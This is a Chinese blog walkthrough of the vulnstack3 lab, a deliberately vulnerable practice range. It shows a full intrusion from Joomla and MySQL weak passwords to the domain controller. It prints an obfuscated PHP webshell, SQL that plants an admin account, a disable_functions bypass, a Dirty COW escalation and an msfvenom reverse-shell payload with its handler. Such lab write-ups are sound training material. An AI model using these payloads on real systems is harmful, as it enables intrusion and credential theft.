当前位置: 首页 > news >正文

【红日靶场】vulnstack3-完整渗透过程

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程


文章目录

  • 系列文章目录
  • 基本信息
  • 环境配置
  • 开始渗透
    • 信息收集
    • 暴力破解
    • 漏洞利用
    • 绕过
    • 内网信息收集
    • 尝试上线msf
    • 上线msf
    • 横向移动
    • msf 传达会话给cs
    • 横向到域控


基本信息

作者:licong

  • 环境配置:
    打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。
    挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。
    除重新获取ip,不建议进行任何虚拟机操作。
    参考虚拟机网络配置,添加新的网络,该网络作为内部网络。
    注:名称及网段必须符合上述图片,进行了固定ip配置。

描述
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码。

环境配置

在这里插入图片描述
centos重启一下网卡:
在这里插入图片描述

开始渗透

信息收集

目标为10.50.128.107:其他目标不知道
在这里插入图片描述
在这里插入图片描述
看这里的图标应该是joomla:
在这里插入图片描述
存在:s2-007
在这里插入图片描述
利用失败,应该是误报
dirb爆破目录:
在这里插入图片描述
这个是后台:
在这里插入图片描述

尝试使用joomla的poc:失败了
在这里插入图片描述

指纹识别:
在这里插入图片描述

暴力破解

上面有个3306爆破一下数据库:
在这里插入图片描述

漏洞利用

没想到是数据库弱密码:
在这里插入图片描述
在这里插入图片描述

这里数据库没有权限:

在这里插入图片描述
用HeidiSQL连接:
在这里插入图片描述
直接用这个数据库做提权试试:
在这里插入图片描述
还是不行,直接获取joomla用户名密码上面我们找到他的后台了:
在这里插入图片描述
将密码保存下来:
在这里插入图片描述
用john解密:
在这里插入图片描述
破解一会:
在这里插入图片描述
等它慢慢跑,再去找找其他的信息:phpinfo界面
在这里插入图片描述
joomla版本信息:
在这里插入图片描述
这个配置下面有个密码像是mysql的配置:
先测试一下登录后台
在这里插入图片描述
登录后台试试:
在这里插入图片描述
不是后台的密码:尝试了admin,testuser
在这里插入图片描述
尝试前台登录:
在这里插入图片描述
在这里插入图片描述

连接成功:
在这里插入图片描述

直接添加一个用户:

USE joomla;INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('julien', 'julien','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());INSERT INTO `am2zu_user_usergroup_map` (`user_id`, `group_id`)
VALUES (LAST_INSERT_ID(), '8');

这里直接给的密码加密过的方式
在这里插入图片描述
还能直接修改为:secret
在这里插入图片描述
我尝试插入数据但是加密过的数据不考虑joomla的加密方式直接修改数据库也是可以的:
在这里插入图片描述
还能尝试爆破使用john工具爆破,但这里用的应该是随机密码爆不出来:
直接登录后台:
在这里插入图片描述
写入shell:
在这里插入图片描述
在这里插入图片描述
写个蚁剑的免杀马:
在这里插入图片描述
保存
在这里插入图片描述
路径:
在这里插入图片描述
感觉像是免杀马问题没连上
在这里插入图片描述
突然想到上面的php版本是7而且禁用了很多危险函数:
在这里插入图片描述
用蚁剑的shell生成:

<?php $mXPo=create_function(base64_decode('JA==').str_rot13('f').str_rot13('b').str_rot13('z').chr(0x32e-0x2c9),base64_decode('ZQ==').chr(558-440).chr(0x17b-0x11a).chr(59940/555).base64_decode('KA==').chr(0x2a7-0x283).str_rot13('f').base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ==').str_rot13(')').chr(50622/858));$mXPo(base64_decode('OTEzO'.'DQ2O0'.'BldkF'.'sKCRf'.''.chr(474-389).chr(642-573).chr(026463/0313).str_rot13('G').chr(429-343).''.''.base64_decode('Rg==').chr(285-170).base64_decode('Mg==').base64_decode('Tg==').chr(01250-01076).''.'ZdKTs'.'yNzQx'.'NTM4O'.'w=='.''));?>

在这里插入图片描述
在这里插入图片描述
成功连接:
在这里插入图片描述

绕过

这里是因为函数禁用的原因:返回ret=127
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里插入图片描述

http://10.50.128.107/templates/beez3/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so

成功绕过:
在这里插入图片描述

内网信息收集

查看一下网卡:发现不对劲为内网段
在这里插入图片描述

尝试上线msf

在这里插入图片描述
上传:
在这里插入图片描述
加权限后运行:(失败了)
在这里插入图片描述
这里有个mysql文件夹:
这里添加了一个用户
在这里插入图片描述
这台主机的22端口是开放的尝试登录:
登录成功了
在这里插入图片描述
权限不够:
在这里插入图片描述
尝试上线msf(失败了,这里就不放了)
直接提权:
这里Linux kernel>2.6.22可以直接用脏牛
在这里插入图片描述
脏牛:https://github.com/Rvn0xsy/linux_dirty
在这里插入图片描述
提权到root了
在这里插入图片描述
查看一下网卡:
在这里插入图片描述
那上面那台主机使用的NGINX反向代理代理到这个网口的,所以刚刚的webshell是另外一台的主机:
现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)

我这直接用内网网卡做:msf

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.93.128 LPORT=8888 -f elf > mshell.elfmsfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.93.128
set lport 8888
run

在这里插入图片描述

在这里插入图片描述

内网探测:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这台应该是NGINX反向代理那台:
在这里插入图片描述
fscna探测一下:
在这里插入图片描述

上线msf

上面没成功这里有root权限直接上传马上线:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

横向移动

存在10和20还有30主机现在已经拿到了100和120主机的权限了,在拿下其他的主机:
先整理一下信息:
192.168.93.30 MSBROWSE\WIN7 Windows 7 Professional 7601 Service Pack 1
192.168.93.20 TEST\WIN2008 Windows Server ® 2008 Datacenter 6003 Service Pack 2
192.168.93.10 DC TEST\WIN-8GA56TNV3MV Windows Server 2012 R2 Datacenter 9600

域控制器应该是10地址上,其他win7可能是用户20可能是服务器:
端口方面:
192.168.93.10 :主要关注135和445还有88端口389
192.168.93.20:主要关注80、445、1443和2383
192.168.93.30 :主要关注135、139、443
尝试访问80端口:
在这里插入图片描述
这里可能存在CVE-2020-0618

在这里插入图片描述
我的内网可以直接访问:(大家需要做socke)
直接爆破一下smb:在这里插入图片描述
kali使用smb登录:

在这里插入图片描述
在域内:
在这里插入图片描述
域控为10主机:其实fscan哪里也可以看到
在这里插入图片描述
看一下端口:
在这里插入图片描述
创建监听器:
在这里插入图片描述
在这里插入图片描述

msf 传达会话给cs

msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.93.128
lhost => 192.168.93.128
msf6 exploit(windows/local/payload_inject) > set lport 4422
lport => 4422
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run

没成功多运行几次
在这里插入图片描述

在这里插入图片描述
抓取密码:
在这里插入图片描述
再次横向移动:
在这里插入图片描述
在这里插入图片描述

横向到域控

成功拿到域控
在这里插入图片描述
再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了
443也爆破不了
在这里插入图片描述
还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。

相关文章:

【红日靶场】vulnstack3-完整渗透过程

系列文章目录 【红日靶场】vulnstack1-完整渗透过程 【红日靶场】vulnstack2-完整渗透过程 【红日靶场】vulnstack3-完整渗透过程 文章目录 系列文章目录基本信息环境配置开始渗透信息收集暴力破解漏洞利用绕过内网信息收集尝试上线msf上线msf横向移动msf 传达会话给cs横向到域…...

物联网通信技术课程作业资料(TPUNB技术)

参考内容 TPUNB无线通信技术 - 技象科技 (techphant.cn) 技象科技CTO郑凛&#xff1a;用最好的物联网服务最多的人 | 了不起的创变者_技术_通信_团队 (sohu.com) LPWAN技术融合使用大势之下&#xff0c;TPUNB奔跑的一年-IOTE物联网展 (baidu.com) 院士认可国际首创&#xf…...

[开源]研发管理项目,支持从需求到代码发布全过程全生命周期管理

一、开源项目简介 neatlogic-rdm支持从需求到代码发布全过程覆盖。具备需求管理、缺陷追踪、测试计划、测试用例、报表仪表板等功能&#xff0c;支持关联外部代码库如GitLab、GitHub等。个性化的属性配置和状态流转控制&#xff0c;能帮助用户管理不同类型项目。 二、开源协议…...

一文生成猫眼电影热榜词云

1.爬取猫眼电影热榜数据 此次爬取的是电影票房的热榜电影名称&#xff0c;具体网站网址为猫眼电影热榜&#xff0c;经过实验观察后发现&#xff0c;此处的数据是通过ajax异步加载的&#xff0c;如果不相信可以使用request对当前网站网址发送请求&#xff0c;会发现无法获取电影…...

监控脚本展示

需求&#xff1a; 监控SVQC&#xff0c;SVCD&#xff0c;FHTC&#xff0c;FHQC&#xff0c;FHCD文件的生成 监控服务器&#xff1a;10.10.3.56 监控路径&#xff1a;/data/app/datafile/ftp/qdttec/10000002/download/yyyyMMdd/* 监控时间&#xff1a;每天7点开始&#xff0c;2…...

【重拾C语言】五、模块化程序设计——函数(定义、调用、参数传递、结果返回、函数原型;典例:打印字符图形、验证哥德巴赫猜想)

目录 前言 五、模块化程序设计——函数 5.1 计算三角形的重心 5.2 函数 5.2.1 函数定义 5.2.2 函数调用 a. 函数调用的形式和过程 b. 参数传递 值传递 指针传递 c. 函数结果返回 5.2.3 函数原型&#xff08;先调用后定义&#xff09; 5.3 程序设计实例 5.3.1 打印…...

Unity实现设计模式——迭代器模式

Unity实现设计模式——迭代器模式 迭代器模式是一种行为型设计模式&#xff0c;它提供了一种统一的方式来访问集合对象中的元素&#xff0c;而不是暴露集合内部的表示方式。简单地说&#xff0c;就是将遍历集合的责任封装到一个单独的对象中&#xff0c;我们可以按照特定的方式…...

【数据结构与算法】之“堆”介绍

目录 堆的基本存储 一、概念及其介绍 二、适用说明 三、结构图示 堆的 shift up 堆的 shift down 基础堆排序 一、概念及其介绍 二、适用说明 三、过程图示 优化堆排序 索引堆及其优化 一、概念及其介绍 二、适用说明 三、结构图示 堆的基本存储 一、概念及其介…...

ncnn Fatal signal 11 (SIGSEGV) 使用GPU加速崩溃

如果你的报错堆栈中包含以下信息,其中的关键信息是 anon:dalvik-classes2.dex extracted in memory Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x3c in tid 8619 (eplabv3plusncnn), pid 8619 () 2023-10-07 15:48:31.395 9793-9793 DEBUG …...

计算机考研 | 2018年 | 计算机组成原理真题

文章目录 【计算机组成原理2018年真题44题-15分】【第一步&#xff1a;信息提取】【第二步&#xff1a;具体解答】 【计算机组成原理2018年真题45题-8分】【第一步&#xff1a;信息提取】【第二步&#xff1a;具体解答】 【计算机组成原理2018年真题44题-15分】 某计算机采用页…...

用Configuration注解的方式写一个java过滤器的详细实例?

在Java中&#xff0c;可以使用Configuration注解和Spring框架来创建和配置过滤器。下面是一个详细的示例&#xff1a; 首先&#xff0c;创建一个实现javax.servlet.Filter接口的过滤器类&#xff0c;例如MyFilter&#xff1a; import javax.servlet.*; import java.io.IOExce…...

基于Springboot实现旧物置换网站平台演示【项目源码+论文说明】分享

基于Springboot实现旧物置换网站平台演示 摘要 随着时代在一步一步在进步&#xff0c;旧物也成人们的烦恼&#xff0c;许多平台网站都在推广自已的产品像天猫、咸鱼、京东。所以开发出一套关于旧物置换网站成为必需。旧物置换网站主要是借助计算机&#xff0c;通过对用户进行管…...

想要精通算法和SQL的成长之路 - 存在重复元素

想要精通算法和SQL的成长之路 - 存在重复元素 前言一. 存在重复元素II二. 存在重复元素III2.1 基于红黑树增删改查 前言 想要精通算法和SQL的成长之路 - 系列导航 一. 存在重复元素II 原题链接 思路&#xff1a; 我们用HashSet存储元素&#xff0c;做到去重的效果。同时存储…...

使用华为eNSP组网试验⑸-访问控制

今天练习使用华为sNSP模拟网络设备上的访问控制&#xff0c;这样的操作我经常在华为的S7706、S5720、S5735或者H3C的S5500、S5130、S7706上进行&#xff0c;在网络设备上根据情况应用访问控制的策略是一个网管必须熟练的操作&#xff0c;只是在真机上操作一般比较谨慎&#xff…...

iPhone苹果手机闹钟智能跳过节假日怎么设置?

国内绝大多数的手机用户使用的操作系统只有三个&#xff0c;安卓、鸿蒙和苹果的ios。而iPhone苹果手机的忠实用户是非常多的&#xff0c;所以日积月累中用户数量也就非常庞大&#xff0c;并且相当一部分用户都是上班族。而工作忙碌的上班族因为事情比较多&#xff0c;为了避免自…...

TenDB Cluster 简介

文章目录 1.简介2.TSpider3.TenDB4.Tdbctl5.TenDB Cluster Operator参考文献 1.简介 TenDB Cluster 是腾讯游戏 CROS DBA 团队提供的 MySQL 分布式关系型数据库解决方案。主要特点包括&#xff1a;透明分库分表、高可用的 MySQL 集群服务&#xff0c;透明及在线的扩容及缩容&a…...

【刷题笔记10.6】LeetCode:翻转二叉树

LeetCode&#xff1a;翻转二叉树 一、题目描述 给你一颗二叉树的根节点root&#xff0c;翻转这颗二叉树&#xff0c;并返回其根节点。 二、分析 我们在做二叉树题目时候&#xff0c;第一想到的应该是用 递归 来解决。 仔细看下题目的 输入 和 输出&#xff0c;输出的左右…...

【高阶数据结构】图详解第一篇:图的基本概念及其存储结构(邻接矩阵和邻接表)

文章目录 1. 图的基本概念1.1 什么是图1.2 有向图和无向图1.3 完全图1.4 邻接顶点1.5 顶点的度1.6 路径1.7 路径长度1.8 简单路径与回路1.9 子图1.10 连通图1.11 强连通图1.12 生成树 2. 图的存储结构2.1 邻接矩阵2.2 邻接矩阵代码实现结构定义构造函数添加边打印图测试 2.3 邻…...

IPV4跟IPV6的区别

如今互联网快速发展ipv4已经满足不了现在的需求&#xff0c;那么这时候就需要用更大的地址空间来代替&#xff0c;这时候ipv6就可以满足这一需求&#xff0c;相比ipv4它有更大的地址空间可供使用。下面我将分享一下有何区别。 IPv4与IPv6之间的区别: 1、地址长度的区别:IPv4具…...

利用fitnesse实现api接口自动化测试

上午在园子里乱逛&#xff0c;看了不少小伙伴们分享的接口测试方面的知识&#xff0c;仔细想想&#xff0c;我做接口测试也有几个年头了&#xff0c;大家所叙述到的一些经验或多或少&#xff0c;我也曾遇到过&#xff0c;突然意识到知识的点滴积累是多么的重要&#xff0c;我记…...

智慧医疗能源事业线深度画像分析(上)

引言 医疗行业作为现代社会的关键基础设施,其能源消耗与环境影响正日益受到关注。随着全球"双碳"目标的推进和可持续发展理念的深入,智慧医疗能源事业线应运而生,致力于通过创新技术与管理方案,重构医疗领域的能源使用模式。这一事业线融合了能源管理、可持续发…...

Python:操作 Excel 折叠

💖亲爱的技术爱好者们,热烈欢迎来到 Kant2048 的博客!我是 Thomas Kant,很开心能在CSDN上与你们相遇~💖 本博客的精华专栏: 【自动化测试】 【测试经验】 【人工智能】 【Python】 Python 操作 Excel 系列 读取单元格数据按行写入设置行高和列宽自动调整行高和列宽水平…...

【CSS position 属性】static、relative、fixed、absolute 、sticky详细介绍,多层嵌套定位示例

文章目录 ★ position 的五种类型及基本用法 ★ 一、position 属性概述 二、position 的五种类型详解(初学者版) 1. static(默认值) 2. relative(相对定位) 3. absolute(绝对定位) 4. fixed(固定定位) 5. sticky(粘性定位) 三、定位元素的层级关系(z-i…...

【Java_EE】Spring MVC

目录 Spring Web MVC ​编辑注解 RestController RequestMapping RequestParam RequestParam RequestBody PathVariable RequestPart 参数传递 注意事项 ​编辑参数重命名 RequestParam ​编辑​编辑传递集合 RequestParam 传递JSON数据 ​编辑RequestBody ​…...

JS设计模式(4):观察者模式

JS设计模式(4):观察者模式 一、引入 在开发中&#xff0c;我们经常会遇到这样的场景&#xff1a;一个对象的状态变化需要自动通知其他对象&#xff0c;比如&#xff1a; 电商平台中&#xff0c;商品库存变化时需要通知所有订阅该商品的用户&#xff1b;新闻网站中&#xff0…...

tomcat入门

1 tomcat 是什么 apache开发的web服务器可以为java web程序提供运行环境tomcat是一款高效&#xff0c;稳定&#xff0c;易于使用的web服务器tomcathttp服务器Servlet服务器 2 tomcat 目录介绍 -bin #存放tomcat的脚本 -conf #存放tomcat的配置文件 ---catalina.policy #to…...

WEB3全栈开发——面试专业技能点P7前端与链上集成

一、Next.js技术栈 ✅ 概念介绍 Next.js 是一个基于 React 的 服务端渲染&#xff08;SSR&#xff09;与静态网站生成&#xff08;SSG&#xff09; 框架&#xff0c;由 Vercel 开发。它简化了构建生产级 React 应用的过程&#xff0c;并内置了很多特性&#xff1a; ✅ 文件系…...

python可视化:俄乌战争时间线关键节点与深层原因

俄乌战争时间线可视化分析&#xff1a;关键节点与深层原因 俄乌战争是21世纪欧洲最具影响力的地缘政治冲突之一&#xff0c;自2022年2月爆发以来已持续超过3年。 本文将通过Python可视化工具&#xff0c;系统分析这场战争的时间线、关键节点及其背后的深层原因&#xff0c;全面…...

作为点的对象CenterNet论文阅读

摘要 检测器将图像中的物体表示为轴对齐的边界框。大多数成功的目标检测方法都会枚举几乎完整的潜在目标位置列表&#xff0c;并对每一个位置进行分类。这种做法既浪费又低效&#xff0c;并且需要额外的后处理。在本文中&#xff0c;我们采取了不同的方法。我们将物体建模为单…...

LeetCode 2894.分类求和并作差

目录 题目&#xff1a; 题目描述&#xff1a; 题目链接&#xff1a; 思路&#xff1a; 思路一详解&#xff08;遍历 判断&#xff09;&#xff1a; 思路二详解&#xff08;数学规律/公式&#xff09;&#xff1a; 代码&#xff1a; Java思路一&#xff08;遍历 判断&a…...